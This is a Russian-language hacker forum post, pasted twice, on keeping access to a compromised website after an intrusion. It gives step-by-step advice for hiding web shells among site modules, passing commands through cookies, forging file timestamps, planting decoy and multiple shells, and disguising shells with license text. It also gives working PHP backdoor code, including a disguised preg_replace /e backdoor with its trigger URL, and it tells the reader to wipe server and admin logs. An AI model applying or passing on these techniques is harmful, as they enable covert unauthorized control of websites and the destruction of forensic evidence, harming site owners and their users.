И так, вы залились, у вас есть несколько часов до прибытие админа.
1. Не редко бывает что сайт состоит из модулей. Копируем наш шелл в папку с модулями, придумываем ему тематическое название (Проверьте обязательно работоспособность)
2. Шелл желательно должен передавать данные методом cookie(), а не POST, либо GET. Меньшее палево в логах.
3. Touch - одно из самых главных. Смотрим среднюю дату изменений рядом лежащих файлов, и меняем.
4. Обязательно несколько разных шеллов в разных директориях (Часто админ удаляет один шелл. Советую заливать r57 как файл для удаления, ибо все АВ и сканеры, сразу его палят).
5. Открываем любой файл движка. Если ломайте не самописный двиг, то там обычно текст лицензии, обязательно его добавляем в наш шелл.
6. Файл .htaccess, маскировать шелл как .jpg файл. Палево. Ибо .htaccess выведется при ls -la. Редко администратор смотрит за системой через GUI (KDE, Gnome)
7. Бэкдор в файле. И не стоит делать их явными:
<?PHP eval($_GET['c']); ?>
Одно время делал вот так:
Если админ ламер, или не увидит это, то выполнение кода легко:
/file.php?id_session_number=userslol&id_session_text=phpinfo();
8. ОБЯЗАТЕЛЬНО ЧИСТИМ ЛОГИ. Логи веб сервера, логи в админ панель о неудачной авторизации.
McGrath специально для c.pro
1. Не редко бывает что сайт состоит из модулей. Копируем наш шелл в папку с модулями, придумываем ему тематическое название (Проверьте обязательно работоспособность)
2. Шелл желательно должен передавать данные методом cookie(), а не POST, либо GET. Меньшее палево в логах.
3. Touch - одно из самых главных. Смотрим среднюю дату изменений рядом лежащих файлов, и меняем.
4. Обязательно несколько разных шеллов в разных директориях (Часто админ удаляет один шелл. Советую заливать r57 как файл для удаления, ибо все АВ и сканеры, сразу его палят).
5. Открываем любой файл движка. Если ломайте не самописный двиг, то там обычно текст лицензии, обязательно его добавляем в наш шелл.
6. Файл .htaccess, маскировать шелл как .jpg файл. Палево. Ибо .htaccess выведется при ls -la. Редко администратор смотрит за системой через GUI (KDE, Gnome)
7. Бэкдор в файле. И не стоит делать их явными:
<?PHP eval($_GET['c']); ?>
Одно время делал вот так:
Code:
if (intval($_GET['id_session_number'])){
preg_replace("/users/e",$_GET['id_session_text'],$_GET['id_session_number']);
}Если админ ламер, или не увидит это, то выполнение кода легко:
/file.php?id_session_number=userslol&id_session_text=phpinfo();
8. ОБЯЗАТЕЛЬНО ЧИСТИМ ЛОГИ. Логи веб сервера, логи в админ панель о неудачной авторизации.
McGrath специально для c.pro
Last edited:
